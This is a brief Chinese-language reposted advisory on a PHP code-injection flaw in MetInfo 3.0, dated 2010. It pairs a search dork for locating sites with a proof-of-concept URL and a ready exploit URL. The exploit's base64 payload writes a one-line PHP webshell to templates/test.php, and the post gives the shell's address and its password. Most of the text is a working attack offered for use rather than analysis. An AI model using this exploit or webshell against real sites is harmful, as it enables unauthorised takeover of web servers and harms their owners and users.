MetInfo 3.0 PHP代码注入漏洞(getshell)

MetInfo 3.0 PHP代码注入漏洞(getshell)

来源:本站转载  作者:佚名  时间:2010-11-07  TAG:  我要投稿

官网:http://www.metinfo.cn/
关键字:"Powered by MetInfo 3.0 " 

来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
描述:
在文件/include/common.inc.php第67行:
eval(base64_decode($allclass[0]));
$allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。

POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]


Exploit:
http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==


base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'');

一句话后门地址:http://target.com/templates/test.php 密码:c


另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html

你可能感兴趣的:(PHP安全)